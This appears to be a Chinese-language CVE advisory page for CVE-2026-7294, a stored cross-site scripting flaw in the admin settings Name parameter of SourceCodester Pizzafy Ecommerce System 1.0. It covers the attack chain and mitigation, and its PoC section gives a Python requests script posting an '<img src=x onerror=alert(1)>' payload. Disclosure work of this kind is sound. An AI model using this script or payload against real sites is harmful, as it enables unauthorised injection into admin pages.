CVE-2026-7294 CVSS 2.4 低危

CVE-2026-7294 SourceCodester Pizzafy跨站脚本漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7294

漏洞类型

跨站脚本 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本存在存储型XSS漏洞。该漏洞位于后台的save_settings功能中，由于未对Name参数进行有效过滤，攻击者可植入恶意脚本。攻击需管理员权限及用户交互，成功利用可能导致完整性受损。

技术细节

该漏洞属于存储型跨站脚本攻击，根源在于/admin/index.php?page=save_settings接口对输入数据的处理不当。当管理员提交系统设置时，Name参数的值被直接存储而未经过滤或转义。由于攻击需要高权限（PR:H）和用户交互（UI:R），攻击者通常通过诱导管理员在特定配置项中输入 payload 实现攻击。当管理员后续访问渲染该配置的页面时，恶意脚本将在浏览器中执行，可能导致会话劫持或进一步攻击。

攻击链分析

STEP 1

1. 权限获取

攻击者获取系统管理员权限账号（CVSS要求PR:H）。

STEP 2

2. 恶意注入

攻击者在后台设置页面(/admin/index.php?page=save_settings)的Name参数中注入XSS Payload。

STEP 3

3. 数据存储

系统将未经过滤的恶意数据保存到数据库或配置文件中。

STEP 4

4. 触发漏洞

管理员访问包含该配置数据的页面，浏览器解析并执行恶意脚本（UI:R）。

STEP 5

5. 攻击执行

恶意脚本在管理员浏览器上下文中运行，可能导致数据篡改或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/admin/index.php?page=save_settings"

# Malicious XSS payload
payload = '<img src=x onerror=alert(1)>'

# Data to be sent, 'Name' is the vulnerable parameter
payload_data = {
    "Name": payload,
    # Add other necessary parameters based on the form
}

# Cookies for authentication (Admin privileges required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Send the POST request
response = requests.post(url, data=payload_data, cookies=cookies)

if response.status_code == 200:
    print("Payload injected successfully. Verify XSS on admin settings page.")
else:
    print("Failed to inject payload.")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在修复补丁发布前，建议限制后台管理入口的访问IP，加强管理员账号安全意识，避免在配置项中输入不可信内容，并部署Web应用防火墙（WAF）以拦截常见的XSS攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7294
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7294
3 Details https://www.cvedetails.com/cve/CVE-2026-7294/
4 VulDB https://vuldb.com/cve/CVE-2026-7294
5 Link https://github.com/joaodrmmd/VulDB-Reports/blob/main/XSS%20-%20Config.pdf
6 Link https://vuldb.com/submit/803172
7 Link https://vuldb.com/vuln/359954
8 Link https://vuldb.com/vuln/359954/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表